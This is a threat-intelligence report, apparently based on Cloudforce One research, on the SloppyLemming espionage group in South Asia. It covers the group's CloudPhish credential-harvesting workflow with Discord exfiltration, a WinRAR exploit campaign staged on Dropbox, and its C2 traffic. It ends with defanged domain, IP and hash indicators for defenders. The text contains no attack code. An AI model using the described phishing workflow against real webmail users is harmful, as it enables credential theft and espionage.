Cloudforce One has identified the cyber group “SloppyLemming,” responsible for extensive attacks across South Asia, particularly targeting Bangladesh, Pakistan, Sri Lanka, and China. The group uses cloud services for credential harvesting, malware distribution, and C2 activities, primarily affecting government, law enforcement, energy, telecom, and tech sectors. Linked to the APT group OUTRIDER TIGER, SloppyLemming frequently employs tools like Cobalt Strike and Havoc to target these regions.
How Credential Harvesting Works
SloppyLemming’s operations often begin with phishing campaigns, where carefully crafted emails are sent to potential victims. These emails are designed to trick the recipient into clicking a malicious link, leading to stolen login credentials. According to Cloudforce One, the actor tailors phishing emails to ensure a high success rate. An example obtained during the investigation reveals how meticulously the emails are designed to look legitimate, increasing the likelihood of their success.
The threat actor utilizes a custom-made tool called CloudPhish to deploy a malicious Cloudflare Worker. This worker manages the credential logging process and sends the stolen credentials back to the attacker. CloudPhish operates as follows:
The operator initiates CloudPhish by entering the following parameters:
- Mission name (usually referring to the operation’s target)
- Target URL
- Discord Webhook URL
- Redirect URL
- Cloudflare URL
Next, the tool:
- Scrapes the HTML content of the target’s webmail login page.
- Verifies whether it’s a support mail client (such as Zimbra, Axigen, or cPanel).
- Replaces the legitimate code in the scraped webmail login page with a link directing users to a malicious Cloudflare Worker endpoint.
- Compiles the final Worker script.
- Inserts the fraudulent HTML code of the spoofed login page with a redirect to the attacker-controlled Worker.
- Implements credential logging and exfiltration via Discord.
Once ready, SloppyLemming operators send phishing emails to their targets. Upon receiving login credentials, the actor accesses the victim’s account to retrieve emails of interest. Cloudforce One obtained a copy of a likely actor-side script used to collect emails from compromised accounts, with key portions detailed below.
Malware Operations
In July 2024, cybersecurity experts from Cloudforce One discovered a malware campaign using Dropbox to exploit a vulnerability in older WinRAR versions (CVE-2023-38831). The operation, linked to the SloppyLemming malware, tricks users into downloading a RAR file named “CamScanner 06-10-2024 15.29.rar”, which contains malicious files disguised as PDFs.
When opened with a vulnerable version of WinRAR, the malware triggers an executable that downloads additional harmful components from Dropbox, including a Remote Access Tool (RAT). This RAT connects to a command server via Cloudflare Workers, posing a serious threat to users. Security experts advise updating software to avoid such attacks.
| SHA256 Hash | Filename |
| CamScanner 06-10-2024 15.29.pdf | fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446 |
| CamScanner 06-10-2024 15.29.pdf | 95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093 |
| CamScanner 06-12-2024 15.29.pdf .exe | 337ca61e23bcb86f26dc40a36316621b74ec6f29a55820899ed30b03b69a6025 |
| CRYPTSP.dll | 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 |
Additional C2 Infrastructure And Traffic Analysis
Recent investigations into a domain associated with malicious activity, pitb.zapto[.]org, have revealed ties to an extensive network of cyber infrastructure. This domain, currently linked to an Alibaba IP address (47.74.10[.]112) These findings indicate a potential actor-controlled infrastructure that may be part of broader cyber espionage operations.
- sco.zapto[.]org
- mofapak[.]info
- confidential.zapto[.]org
- humariweb[.]info
- modp-pk[.]org
- itsupport-gov[.]com
According to cybersecurity experts at Cloudforce One, the hacker group known as SloppyLemming has also used several domains—many leveraging Cloudflare’s reverse proxy services.
- apl-org[.]online
- apl-com[.]icu
- maldevfudding[.]com
- navybd-gov[.]info
- 168-gov[.]info
- aljazeerak[.]online
- adobefileshare[.]com
- crec-bd[.]site
- quran-books[.]store
- hurr.zapto[.]org
- hascolgov[.]info
- helpdesk-lab[.]site
A review of C2 (Command and Control) traffic between September 1st and 6th of 2024 showed significant activity across Pakistan, Bangladesh, and Sri Lanka. Interestingly, a notable amount of traffic was also traced to Australian IP addresses, specifically from Canberra. This raises concerns that the actor may have expanded their focus, potentially targeting Australian government entities.
The hacker group’s typical targets include Pakistan, Bangladesh, and Sri Lanka, but recent C2 traffic from Australian IPs, particularly in Canberra, suggests they may be expanding their focus. This could indicate government-related targeting in Australia, highlighting the evolving nature of their operations.
Majority of targeted organizations falling within the following categories:
- Government
- Law enforcement
- Defense
- Legislative organizations
- Foreign Affairs
- Transportation
- Logistics
- Technology
- IT providers
- Telecommunications
- Energy
- Construction
- Equipment operators
- Education
- Universities
The India-linked hacker group “SloppyLemming” has been conducting widespread cyberattacks across South Asia, targeting key sectors such as government, law enforcement, telecommunications, and technology. Utilizing tools like CloudPhish for credential harvesting and deploying malware through services like Dropbox and Cloudflare, the group focuses heavily on Pakistan, Bangladesh, and neighboring countries. Their operations include malware distribution, credential theft, and C2 traffic, with a notable expansion of activity to Australian IP addresses, indicating potential government-related targeting. The group’s evolving tactics and international reach make them a significant cybersecurity threat.
Indicators of Compromise
SloppyLemming Infrastructure
| Date Observed | Domain | IP Address |
| 2024-09-03T21:50:47Z | www.crec-bd[.]site | 47.83.23.246 |
| 2024-09-03T21:48:50Z | crec-bd[.]site | 47.83.23.246 |
| 2024-08-22T08:17:15Z | jammycanonicalupdates[.]cloud | 159.65.6.251 |
| 2024-08-14T03:22:26Z | locaal.navybd-gov[.]info | 139.59.109.136 |
| 2024-08-12T07:56:35Z | maldevfudding[.]com | 37.27.41.167 |
| 2024-08-07T00:22:29Z | openkm.paknavy-pk[.]org | 47.237.105.113 |
| 2024-07-23T23:47:21Z | cloud.adobefileshare[.]com | 185.249.198.218 |
| 2024-07-23T23:41:37Z | adobefileshare[.]com | 185.249.198.218 |
| 2024-07-15T03:51:55Z | quran-books[.]store | 8.222.235.145 |
| 2024-07-09T23:33:39Z | aljazeerak[.]online | 8.219.169.226 |
| 2024-06-18T02:26:50Z | redzone2.apl-org[.]online | 47.237.20.135 |
| 2024-06-13T03:26:55Z | hurr.zapto[.]org | 47.237.20.135 |
| 2024-06-05T10:25:44Z | login.apl-org[.]online | 47.245.56.29 |
| 2024-05-30T04:08:00Z | helpdesk-lab[.]site | 47.237.20.201 |
| 2024-05-14T23:32:47Z | owa-spamcheck.apl-org[.]online | 47.237.25.198 |
| 2024-04-30T23:29:42Z | redzone.apl-org[.]online | 47.245.2.77 |
| 2024-04-30T23:28:35Z | dawn.apl-org[.]online | 47.237.25.198 |
| 2024-03-28T01:52:34Z | hit-pk[.]org | 208.85.22.252 |
| 2024-03-18T23:31:23Z | blabla.apl-com[.]icu | 8.219.114.124 |
| 2024-03-14T02:53:22Z | acrobat.paknavy-pk[.]org | 47.236.65.190 |
| 2024-03-14T02:40:17Z | paknavy-pk[.]org | 47.236.65.190 |
| 2024-03-10T20:55:07Z | mail.pakistangov[.]com | 47.245.114.11 |
| 2024-03-04T21:42:18Z | mail.apl-com[.]icu | 47.236.65.190 |
| 2024-02-27T23:16:44Z | 168-gov[.]info | 47.76.61.241 |
| 2024-02-27T22:10:28Z | www.168-gov[.]info | 47.76.61.241 |
| 2024-02-26T01:21:45Z | browser.apl-org[.]online | 149.28.153.250 |
| 2024-02-20T03:43:03Z | docs.apl-com[.]icu | 47.245.42.208 |
| 2024-02-07T22:54:18Z | new.apl-org[.]online | 47.74.84.168 |
| 2024-01-31T02:11:32Z | mozilla.apl-org[.]online | 47.74.87.155 |
| 2024-01-30T09:56:42Z | m.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:28Z | monitor.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:17Z | sensors.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-30T09:56:07Z, | static.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:22:07Z | bin.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:48Z | api.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:28Z | frontend-m.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:09:16Z | accounts.opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-28T08:02:58Z, | opensecurity-legacy[.]com | 159.253.120.25 |
| 2024-01-09T21:14:22Z | oil.hascolgov[.]info | 207.148.73.145 |
| 2024-01-03T22:21:14Z | hesco.hascolgov[.]info | 207.148.73.145 |
| 2024-01-02T03:00:46Z | locall.hascolgov[.]info | 207.148.73.145 |
| 2023-12-27T22:46:34Z | itsupport-gov[.]com | 47.254.229.56 |
| 2023-12-18T01:00:57Z | updpcn[.]online | 47.76.181.76 |
| 2023-12-17T22:17:47Z | update.apl-org[.]online | 47.74.84.168 |
| 2023-12-05T22:27:17Z | zero-berlin-covenant.apl-org[.]online | 47.245.126.218 |
| 2023-11-30T23:19:46Z | fonts.apl-org[.]online | 47.74.87.155 |
| 2023-11-29T23:20:18Z | localhost.apl-com[.]icu | 142.93.139.164 |
| 2023-11-15T22:45:35Z | cloud.cflayerprotection[.]com | 45.137.116.8 |
| 2023-11-15T22:45:23Z | secure.cflayerprotection[.]com | 45.137.116.8 |
| 2023-11-15T22:42:39Z | cflayerprotection[.]com | 45.137.116.8 |
| 2023-10-15T23:44:47Z | data[.]cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:44:20Z | secure[.]cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:40:46Z | cloudlflares[.]com | 45.137.116.8 |
| 2023-10-15T23:40:46Z | www[.]cloudlflares[.]com | 45.137.116.8 |
SloppyLemming Malware Samples
| SHA256 Hash | Filename | C2 Address |
| 06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80 | sspicli.dll | pitb.gov-pkgov.workers[.]dev |
| ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d | profapi.dll | pitb.gov-pkgov.workers[.]dev |
| 3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432 | profapis.dll | pitb.gov-pkgov.workers[.]dev |
| 82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211 | CRYPTSP.dll | N/A |
| b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000 | Outlook.eml/ NekroWire.dll | redzone.apl-org[.]online |
Mitigated SloppyLemming Workers Domains
- mail-na-gov-pk.na-gov-pk.workers[.]dev
- storage-e13.sharepoint-e13.workers[.]dev
- zoom.osutuga7.workers[.]dev
- sharepoint-punjab.sharepoint-e13.workers[.]dev
- pitb.gov-pkgov.workers[.]dev
- mail-islamabadpolice-gov-pk.ntc-telecommunication-safecity.workers[.]dev
- herald-b2a.workers[.]dev
- images-11d.workers[.]dev
- classifieds.workers[.]dev
- dawnnews.workers[.]dev
- aurora.dawn-904.workers[.]dev
- epaper.dawn-323.workers[.]dev
- obituary.workers[.]dev
